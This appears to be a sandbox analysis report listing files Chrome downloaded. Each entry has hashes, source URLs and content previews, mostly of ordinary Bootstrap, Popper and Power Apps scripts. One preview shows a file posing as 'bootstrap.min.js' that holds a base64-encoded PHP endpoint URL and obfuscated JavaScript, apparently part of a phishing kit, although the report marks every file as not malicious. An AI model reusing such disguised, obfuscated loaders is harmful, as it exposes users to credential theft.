                                                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48238)
                                                                          Category:downloaded
                                                                          Size (bytes):48239
                                                                          Entropy (8bit):5.343270713163753
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:184E29DE57C67BC329C650F294847C16
                                                                          SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                          SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                          SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                          Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                          Category:downloaded
                                                                          Size (bytes):621
                                                                          Entropy (8bit):7.673946009263606
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:4761405717E938D7E7400BB15715DB1E
                                                                          SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                          SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                          SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):625
                                                                          Entropy (8bit):7.484713757728487
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:1CCFEA34F655127024E56A9182D069B2
                                                                          SHA1:F01C37FC36D6F283021BFE2021F884756ACC0830
                                                                          SHA-256:DDEB1C61FE3FC1C4195D6AF3CA1514F8EB78DE09E6DE3DBFCC960DDFDA93EE54
                                                                          SHA-512:E54442CFC5247B8D7137EB2389CB1E9B66EA2CDF4DBD062BB680D51FB50323CBECB908A6764CA29CEAEBB057C1FEBEE0FB0D7A1E367030531B63CE92B0F9A0C6
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:.PNG........IHDR................a....pHYs.................sRGB.........gAMA......a.....IDATx..R.q.@..=...e:..Dt.+.t.+@. #.'..A.{,U.]Ap.8..T.. .3B.......3.......o.i..n..L.........}..x............Am.p..asd.$..WL.'...I.g.G.-M...c....Q.-..?......^.C..%8.^...(.lW....M..r.....x...'..O..9a..H..L..-.MSD.v.!.1t.{w..S..a..?..1.....q..l.Z.>..fO.t.?...8......9uK..pTU;....f..@..w....6......Dx.....i.._.z..h..b.y.f.S......1...+.0......1....e...,.6%.s...A.@.Qo.#.z.ht.,.K..........X...wn..4t....V.D9}p.}+H.S."..M_.<.H....{Z.Xj....0...g.....Uv.{ng+PWxl....'jkfKB..&..h. ....x...Z@.z.\jq....N........u.W.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (23138), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):23138
                                                                          Entropy (8bit):5.274110821784602
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:AA8F0D7FD1317E37BECD6028F0E3CA32
                                                                          SHA1:1B649A2BAAC92097A21B28B1778A8FD8E4049908
                                                                          SHA-256:8DFCD4E8C95517D4A98889DAE8988DB45B62A8ADFAF41676CD7FA44B88BA2C92
                                                                          SHA-512:C741952ADA6BA4C679DE8BC8F3D604B4ACE158700D362401BFB0EBED8B40E137ABAA14BEE5FB8FE753A6AECEE53130F541836F215F550A76EEFB895D86DA1E2D
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/js/app.53.js?id=4899dc220d56833b4ad1
                                                                          Preview:(self.webpackChunk=self.webpackChunk||[]).push([[53],{8469:(e,t,i)=>{e.exports={mixins:[i(3381)],data:function(){return{shown:!1}},mounted:function(){i(7729)},methods:{showModal:function(e){this.$nextTick((function(){$.magnificPopup.open(_.extend({items:{src:$(this.$refs.modal)},midClick:!0,removalDelay:500,mainClass:"mfp-zoomIn",overflowY:"scroll",callbacks:{open:this.opened,close:this.closed}},e)),this.shown=!0,this.magnificPopup=$.magnificPopup.instance}))},closeModal:function(){this.magnificPopup.close()},opened:function(){this.shown=!0,this.$emit("shown")},closed:function(){this.shown=!1,this.$emit("closed")}}}},7729:()=>{!function(e){var t,i,n,o,a,r,s,l="Close",c="BeforeClose",p="MarkupParse",d="Open",u="Change",f="mfp",m=".mfp",g="mfp-ready",h="mfp-removing",v="mfp-prevent-close",C=function(){},w=!!window.jQuery,y=e(window),b=function(e,i){t.ev.on(f+e+m,i)},I=function(t,i,n,o){var a=document.createElement("div");return a.className="mfp-"+t,n&&(a.innerHTML=n),o?i&&i.appendChild(a
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65294), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):92085
                                                                          Entropy (8bit):5.011925941956388
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:BE8391E97DEA755C86C38DB4E43773D8
                                                                          SHA1:3E573E059A8C52A1B7063895562F6A23261F54A0
                                                                          SHA-256:BBB5F1A1DF8E94BE934B438B99E27173F2EC270005C7ABE07204BFE0DD64B134
                                                                          SHA-512:AB51CA9BDE0B02A96E34F1B1FEC7B8B5D3B688431C9ECF8EE26308E578A952EED1A067CFA8C09433645AD7FC287E72C09E2EF9B72724616F877B5915AD7D2056
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/bootstrap.BootstrapV5.bundle-be8391e97d.js
                                                                          Preview:/*!.. * Bootstrap v5.2.2 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */..!function (t, e) { "object" == typeof exports && "undefined" != typeof module ? module.exports = e() : "function" == typeof define && define.amd ? define(e) : (t = "undefined" != typeof globalThis ? globalThis : t || self).bootstrap = e() }(this, (function () { "use strict"; const t = "transitionend", e = t => { let e = t.getAttribute("data-bs-target"); if (!e || "#" === e) { let i = t.getAttribute("href"); if (!i || !i.includes("#") && !i.startsWith(".")) return null; i.includes("#") && !i.startsWith("#") && (i = `#${i.split("#")[1]}`), e = i && "#" !== i ? i.trim() : null } return e }, i = t => { const i = e(t); return i && document.querySelector(i) ? i : null }, n = t => { const i = e(t); return i ? document.querySelector(i) : null }, s = e => {
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):30199
                                                                          Entropy (8bit):5.084288947442727
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:3030AEDCB4F044B0CC4A2E3B6DF00259
                                                                          SHA1:C74BAC96C68691D53E781054B0F83A4581F16E95
                                                                          SHA-256:408F15E5BC6FF761D8AB50C8D3D318E4F9EB16A3E99E576EBC688CB4FC411634
                                                                          SHA-512:D5A2B2F790AB25FF25BE32591B61413DB6143DFDD8A150A0869D73187BD5836475A18B9597013A1ADFF39EBBB601CE6F7E9D0E1479B695B8BAA0E4F062D729E1
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://site-xtxg5.powerappsportals.com/_portal/d2c9c1cb-e35c-462e-996b-95a0b142a77b/Resources/ResourceManager?lang=en-US
                                                                          Preview:....window.ResourceManager = {.. 'Cms_Sitemapchildren_Update_Label' : "Children", .. 'EntityGrid_Url_NotFound' : "A required service URL wasn\u0027t provided.",.. 'FileBrowser_Header_Label' : "Choose a file.",.. 'ADX_EventSchedule_AcceptableDays' : "Acceptable days",.. 'Confirm_DeleteMultiple_Entity' : "Are you sure you want to delete these records?",.. 'ADX_Blog_ShortName' : "blog",.. 'ADX_BlogPost_ShortName' : "blog post",.. 'Entity_Create_ADX_BlogPost_Label' : "Blog post",.. 'Entity_Create_ADX_Blog_Label' : "Child blog",.. 'Entity_Create_ADX_Event_Label' : "Child event",.. 'Entity_Create_ADX_CommunityForum_Label' : "Child forum",.. 'Editable_DeleteMultiple_Tooltip_Suffix_Singular' : "Child record?",.. 'Editable_DeleteMultiple_Tooltip_Suffix_Plural' : "Child records?",.. 'Entity_Create_ADX_Shortcut_Label' : "Child shortcut",.. 'ADX_BlogPostComment_ShortName' : "comment",.. 'ADX_PageComment_ShortName' : "comment",... 'Entity_Create_ADX_BlogPost_Tooltip' : "Create a new blog post",..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                          Category:downloaded
                                                                          Size (bytes):175
                                                                          Entropy (8bit):6.703816897435343
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:F67C80E3150F35172559C4F8FF5C324C
                                                                          SHA1:82224555F49ED30802749F57E1AF1A1EBA2C03FB
                                                                          SHA-256:1EF4A6E2B8890F93451F1BE7E4A08FEA28954BF6780C3677CA0DA475A815D988
                                                                          SHA-512:6024EC977CBAF6C80D03F90034D237C128E1831E553317271AAD46CBE7A4A8073A3EF1AB5263E13ED4BACF327C8238408902780826D6692B5A141BB3C11B162E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://qbauyd.celestialjourney.it.com/favicon.ico
                                                                          Preview:(./..X..."."!PG...X.....'..........U..i.LL..]Y...[_.....O..|.R_.d...:'.}.$}..3....[#.....$...b&.}.ir$..S.....r..bv..e.q..k(Tq........D.N.X....]...2....9.z.d........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (27756), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):27756
                                                                          Entropy (8bit):5.261201116687184
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:BA9103C47A8197131A4E31368EF59CD2
                                                                          SHA1:39E2615DF5B30FA4FEEA555A9E20898EC2AF5F42
                                                                          SHA-256:EA9C8AB7DDC51C58726A9B08580AB0683207EE46783DAF9B9FBD8830611C4878
                                                                          SHA-512:8DDC4C0E6F41A5999DDD1592191190C4A888ABBD50B24FEE53AFF729664C17DE05C9AC4F82554AC40896836A3118818163122DABD48EA69F2EEA19535B128C89
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/js/app.283.js?id=08492960abc6ccdee546
                                                                          Preview:(self.webpackChunk=self.webpackChunk||[]).push([[283],{8469:(e,t,o)=>{e.exports={mixins:[o(3381)],data:function(){return{shown:!1}},mounted:function(){o(7729)},methods:{showModal:function(e){this.$nextTick((function(){$.magnificPopup.open(_.extend({items:{src:$(this.$refs.modal)},midClick:!0,removalDelay:500,mainClass:"mfp-zoomIn",overflowY:"scroll",callbacks:{open:this.opened,close:this.closed}},e)),this.shown=!0,this.magnificPopup=$.magnificPopup.instance}))},closeModal:function(){this.magnificPopup.close()},opened:function(){this.shown=!0,this.$emit("shown")},closed:function(){this.shown=!1,this.$emit("closed")}}}},7729:()=>{!function(e){var t,o,i,a,n,r,s,l="Close",c="BeforeClose",p="MarkupParse",m="Open",u="Change",d="mfp",f=".mfp",g="mfp-ready",v="mfp-removing",h="mfp-prevent-close",C=function(){},y=!!window.jQuery,w=e(window),b=function(e,o){t.ev.on(d+e+f,o)},_=function(t,o,i,a){var n=document.createElement("div");return n.className="mfp-"+t,i&&(n.innerHTML=i),a?o&&o.appendChild(
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (25293)
                                                                          Category:downloaded
                                                                          Size (bytes):43107
                                                                          Entropy (8bit):5.26903329129244
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:805A1661B77834F61B0C8E1175DC9F90
                                                                          SHA1:38E8EEB48DF5906F796E4C9A4549DFBF0327D656
                                                                          SHA-256:B37275F7C7F76430F05A20E7D0DDDAC3649467DBC0E7AF58CC3F04B1EE6DEA81
                                                                          SHA-512:45004F96FB51B09AC26A409CA1BE79E48568026B1DEE9F0C55B6E5BB2958820AB96B3F6B5649E1BC7289D8E5D64334EA3882D7248926FE532AC7C7F2A7595142
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf-dependency.bundle-805a1661b7.js
                                                                          Preview:(function(e){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=e()}else if(typeof define==="function"&&define.amd){define([],e)}else{var t;if(typeof window!=="undefined"){t=window}else if(typeof global!=="undefined"){t=global}else if(typeof self!=="undefined"){t=self}else{t=this}t.PropTypes=e()}})(function(){var e,t,r;return function i(a,u,c){function f(r,e){if(!u[r]){if(!a[r]){var t=typeof require=="function"&&require;if(!e&&t)return t(r,!0);if(s)return s(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var o=u[r]={exports:{}};a[r][0].call(o.exports,function(e){var t=a[r][1][e];return f(t?t:e)},o,o.exports,i,a,u,c)}return u[r].exports}var s=typeof require=="function"&&require;for(var e=0;e<c.length;e++)f(c[e]);return f}({1:[function(e,t,r){./**. * Copyright (c) 2013-present, Facebook, Inc.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */."use
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (61300)
                                                                          Category:downloaded
                                                                          Size (bytes):164727
                                                                          Entropy (8bit):5.527686835651098
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:11A5A914937B75288F59799624B22C41
                                                                          SHA1:FA1304A3AAE266ECEEA76FF1BED1D2894DAF19F2
                                                                          SHA-256:0D123D26B7574F73FADFC2B904E098C4977CAFFFBA55A94F547ED5B23EBC4169
                                                                          SHA-512:51D67B6EC53CADDA946FFFA3BC82F3D5355E15407FDFF9EE9F01ABFAC91987EE1144016DB1BB15E9A502C1BE45D00CE25202D426707A8BC118627D2C37E2D811
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/postpreform.BootstrapV5.bundle-11a5a91493.js
                                                                          Preview:(function(e,a){var r=[];function n(t,r){var n=a.Deferred();(function e(){a.ajax(t).done(n.resolve).fail(function(){console.log("AjaxRetry attempt :".concat(r));r--;if(r>0){e()}else{n.rejectWith(this,arguments)}})})();return n.promise()}function t(){var e=a.Deferred();var t=a('#antiforgerytoken input[name="__RequestVerificationToken"]').val();if(!t){r.push(e);if(r.length===1){n({type:"GET",url:a("#antiforgerytoken").attr("data-url"),cache:false},3).done(function(e){a("#antiforgerytoken").empty().append(e);t=a('#antiforgerytoken input[name="__RequestVerificationToken"]').val();r.forEach(function(e){e.resolve(t)});r=[]}).fail(function(e){if(e&&e.responseText){var t="GetAntiForgeryToken failed".concat("Details: ",e.responseText);console.log(t);ClientLogWrapper.getLogger().traceError(t,"antiforgerytoken","","GetTokenDeferred")}r.forEach(function(e){e.reject()});r=[]})}}else{e.resolve(t)}return e.promise()}function i(){var e=a("#antiforgerytoken").attr("data-url");n({type:"GET",url:e,cache:f
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):32
                                                                          Entropy (8bit):4.390319531114783
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                          SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                          SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                          SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCQuhlLissZnnEgUNrQmusSEjkbLOnL5jLhIZCUGaByD8IsJLEgUNQ_N2OSGxp6YMcrbumg==?alt=proto
                                                                          Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (394)
                                                                          Category:downloaded
                                                                          Size (bytes):27246
                                                                          Entropy (8bit):5.097783087418822
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:AA9A6710EA1BEA111A4DFD309BEFB3E6
                                                                          SHA1:BC86827D494F35B1C270708D234A558601A8CBFB
                                                                          SHA-256:6727BDFC09DE072624076BB0152FBC12FB3BD59E1A2026585E049372CB45B37E
                                                                          SHA-512:C86B914D7E15DF73FF39D4275967EF7E3627A19A5E4CB7B9F8688B519CB3951106BE4A89152D6741B599D7AF2515C71B233EAAD68804603329AC489ECFF0524C
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://site-xtxg5.powerappsportals.com/portalbasictheme.css
                                                                          Preview:/**. * Code generated by Microsoft. Changes to this file are not. * supported. We recommend that you do not modify this file. Any. * change to this file will get overwritten with a theme applied using. * Site Styling panel from Power Apps Portals.. */.:root {. --portalThemeColor1: #B6B4B2;. --portalThemeColor2: #605E5C;. --portalThemeColor3: #F3F2F1;. --portalThemeColor4: #323130;. --portalThemeColor5: #F8F8F8;. --portalThemeColor6: #5C5A58;. --portalThemeColor7: #FFFFFF;. --portalThemeColor8: #000000;. --portalThemeColor9: #191817;. --portalThemeColor10: ;. --portalThemeColor11: ;. --portalThemeColor12: ;. --portalThemeOnColor1: #000000;. --portalThemeOnColor2: #FFFFFF;. --portalThemeOnColor3: #000000;. --portalThemeOnColor4: #FFFFFF;. --portalThemeOnColor5: #000000;. --portalThemeOnColor6: #FFFFFF;. --portalThemeOnColor7: #000000;. --portalThemeOnColor8: #FFFFFF;. --portalThemeOnColor9: #FFFFFF;. --portalThemeOnColor10: ;. --portalThemeOnColor11: ;. --portalTh
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):1051276
                                                                          Entropy (8bit):5.3474278429573765
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:B0E01B56220D6C0628D683B9315E5C9E
                                                                          SHA1:28A023B5D5BF81B56E6E960E2F8184B0474690C0
                                                                          SHA-256:6732A05BCB83B6C0A177AE32A15DF428073833A57F59C615E6CF730E6F07DB8D
                                                                          SHA-512:8CE977CCB6A48067A32B9A24CDB367325471F443FE027CDF9CDD93119A084E12F92E7D3074FF659BD21E1A3A553102D8D6B53A9DF4453577A0170839E801A24A
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf-extended.bundle-b0e01b5622.js
                                                                          Preview:var __assign=this&&this.__assign||function(){return(__assign=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("React"),require("Fela")):"function"==typeof define&&define.amd?define("ReactFela",["React","Fela"],t):"object"==typeof exports?exports.ReactFela=t(require("React"),require("Fela")):e.ReactFela=t(e.React,e.Fela)}(window,function(o,n){return function(o){var n={};function r(e){if(n[e])return n[e].exports;var t=n[e]={i:e,l:!1,exports:{}};return o[e].call(t.exports,t,t.exports,r),t.l=!0,t.exports}return r.m=o,r.c=n,r.d=function(e,t,o){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65471), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):553001
                                                                          Entropy (8bit):4.842784888334026
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:887DD4246A64FB34707B41362D668A64
                                                                          SHA1:5D5D0F346F19E9CFC9BA2A00D8DBE5F6E829BBEE
                                                                          SHA-256:D39E253797CD877DE30CBD87CBF932CA2A70B759BC540F065018A54BDCE92F72
                                                                          SHA-512:A6AEEEF6A324AD15628ED7CD4C06C25A729CCB719BD5D0DD23B839FDC5DAC19B9C9357162BE38614AED5B211BF2835D871CB0D835E112357EB740AD59FE7A433
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://6068815810-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.js
                                                                          Preview:var file = "aHR0cHM6Ly82MDY4ODE1ODEwLnNicy9nb29nbGUucGhw";....var _0x328e7e=_0x5934;function _0x5934(_0x16ca03,_0x541b4c){var _0x5f0c3c=_0x29fd();return _0x5934=function(_0x3f3d5b,_0x1d80df){_0x3f3d5b=_0x3f3d5b-(0x144+0x2*-0x895+-0x9d*-0x1d);var _0x512a2d=_0x5f0c3c[_0x3f3d5b];return _0x512a2d;},_0x5934(_0x16ca03,_0x541b4c);}(function(_0x313f87,_0x57dc23){var _0x1101e4=_0x5934,_0x128fc2=_0x313f87();while(!![]){try{var _0x486dfe=-parseInt(_0x1101e4(0x19ac))/(0x2221*0x1+-0x874+-0x19ac)+parseInt(_0x1101e4(0x1af9))/(0x1ac7+0x25a2+0x1*-0x4067)+-parseInt(_0x1101e4(0x2282))/(0x1b*0x8b+0x768*0x4+-0x2c46)+parseInt(_0x1101e4(0x27e4))/(-0x103d+-0x22eb+0x332c)+parseInt(_0x1101e4(0x2c80))/(0x23c8+0x7bb*-0x1+-0x138*0x17)*(-parseInt(_0x1101e4(0x23aa))/(-0x1374+-0x2*-0x55e+0x8be))+-parseInt(_0x1101e4(0xbe3))/(-0xb1*-0x1d+0x1a35+-0x523*0x9)+-parseInt(_0x1101e4(0x29c9))/(-0x1276+-0x1bb3+0x2b*0x113)*(-parseInt(_0x1101e4(0x25a0))/(-0x1*0x20ae+-0x94e+0x1f*0x15b));if(_0x486dfe===_0x57dc23)break;else _0x128fc
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65393), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):220723
                                                                          Entropy (8bit):5.4894127092802725
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:F9F45B65A6B544A3D2F809065465B177
                                                                          SHA1:DB96602E547830D7A39D4AF48506B1148483B7E9
                                                                          SHA-256:818C065F4534C661920194228AF4DBDF9DB205A44AD7C410C5313FA3657409DB
                                                                          SHA-512:DF21818356D53070D0486C796FF35811954B8D9761B2A7F530A29592297E25962ED5489E580565B4435F0FA828DB1245A05C3DA6AD9137C14830A308582FCC08
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/client-telemetry.bundle-f9f45b65a6.js
                                                                          Preview:/*!.. * 1DS JS SDK Analytics Web, 3.2.8.. * Copyright (c) Microsoft and contributors. All rights reserved... * (Microsoft Internal Only).. */..var e=this,t=function(n){"use strict";var u="function",s="object",fe="undefined",f="prototype",l="hasOwnProperty",g=Object,v=g[f],y=g.assign,T=g.create,e=g.defineProperty,I=v[l],b=null;function C(e){e=!1===(e=void 0===e||e)?null:b;return e||((e=(e=(e=typeof globalThis!==fe?globalThis:e)||typeof self===fe?e:self)||typeof window===fe?e:window)||typeof global===fe||(e=global),b=e),e}function S(e){throw new TypeError(e)}function M(e){var t;return T?T(e):null==e?{}:((t=typeof e)!==s&&t!==u&&S("Object prototype may only be an Object:"+e),n[f]=e,new n);function n(){}}(C()||{}).Symbol,(C()||{}).Reflect;var N=y||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])v[l].call(t,r)&&(e[r]=t[r]);return e},w=function(e,t){return(w=g.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,t){e.__proto__=t}:function(e,t){for(var n
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):4807
                                                                          Entropy (8bit):4.941343369031878
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:633E70F51B5C0319AF3ACF16EC1AE7B6
                                                                          SHA1:D28238721914C98998ACC0485CCEBF230F01A520
                                                                          SHA-256:FB076F7948CA70EB1F51334FE4C473C40BBE3BCEB105981C482BB8634FF98081
                                                                          SHA-512:1509681E13367F0264CC341C1752B9EF7FFE0714098615282DB2B3688C24AF50D1052421DD606FCFCF942C0BE2D59B7694FA59150923F427FCD807530C56998A
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/client-telemetry-wrapper.bundle-633e70f51b.js
                                                                          Preview:.//// Wrapper class for client logger for below purposes..//// 1. Abstracting CST framework code from manual trace log APIs. ..//// 2. Constrolling instantiation of CST framework code in clientLogger.js based on whether telemetry is enabled..class ClientLogWrapper {...../// Constructor which also creates an instance of actual logger if telemetry is enabled...constructor() {....try {.....if (Helper.isTelemetryEnabled()) {......ClientLogger.getLogger();.....}....}....catch (exception) {.....console.warn(exception);....}...}...../// Gets the client log wrapper. Creates new instance if not already created...static getLogger() {....if (!window.clientLogWrapper) {.....window.clientLogWrapper = new ClientLogWrapper();....}......return window.clientLogWrapper;...}...../// Trace info log.../// For component, subComponent, action, tag, it is recommended to use standard short and crisp one worder string..../// Examples:.../// for component: entity_grid, entity_form etc.../// For SubComponent: f
                                                                          No static file info